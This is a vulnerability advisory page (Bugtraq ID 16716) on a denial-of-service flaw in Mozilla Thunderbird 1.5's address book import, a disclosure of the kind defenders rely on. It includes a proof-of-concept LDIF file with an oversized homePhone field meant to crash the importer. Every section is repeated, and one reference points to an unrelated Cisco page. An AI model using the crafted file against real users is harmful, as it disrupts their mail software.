Mozilla Thunderbird Address Book Import Remote Denial of Service Vulnerability
BID:16716
Info
Mozilla Thunderbird Address Book Import Remote Denial of Service Vulnerability
| Bugtraq ID: | 16716 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 17 2006 12:00AM |
| Updated: | Feb 22 2006 07:12PM |
| Credit: | Discovered by DrFrancky <[email protected]>. |
| Vulnerable: |
Mozilla Thunderbird 1.5 |
| Not Vulnerable: | |
Discussion
Mozilla Thunderbird Address Book Import Remote Denial of Service Vulnerability
Mozilla Thunderbird is prone to a remote denial-of-service vulnerability.
The issue presents itself when the application handles a specially crafted address book file.
Mozilla Thunderbird 1.5 is reportedly affected by this issue. Other versions may be vulnerable as well.
Mozilla Thunderbird is prone to a remote denial-of-service vulnerability.
The issue presents itself when the application handles a specially crafted address book file.
Mozilla Thunderbird 1.5 is reportedly affected by this issue. Other versions may be vulnerable as well.
Exploit / POC
Mozilla Thunderbird Address Book Import Remote Denial of Service Vulnerability
The following proof of concept is available:
POC: create a file.ldif and insert following then import it in address book:
n: cn=Test POC by [email protected],[email protected]
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by [email protected]
cn: POC by [email protected]
mozillaNickname: DrFrancky
mail: [email protected]
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']
The following proof of concept is available:
POC: create a file.ldif and insert following then import it in address book:
n: cn=Test POC by [email protected],[email protected]
objectclass: top
objectclass: person
objectclass: organizationalPerson
objectclass: inetOrgPerson
objectclass: mozillaAbPersonAlpha
givenName: Test
sn: POC by [email protected]
cn: POC by [email protected]
mozillaNickname: DrFrancky
mail: [email protected]
nsAIMid: DrFrancky POC
modifytimestamp: 0Z
homePhone: aaaaaaaaaaaaaaa[2MB of 'a']
Solution / Fix
Mozilla Thunderbird Address Book Import Remote Denial of Service Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected]
References
Mozilla Thunderbird Address Book Import Remote Denial of Service Vulnerability
References:
References:
- Cisco NX-OS Download Page (Cisco)
- Mozila Thunderbird 1.5 Address Book DoS (Javor Ninov
)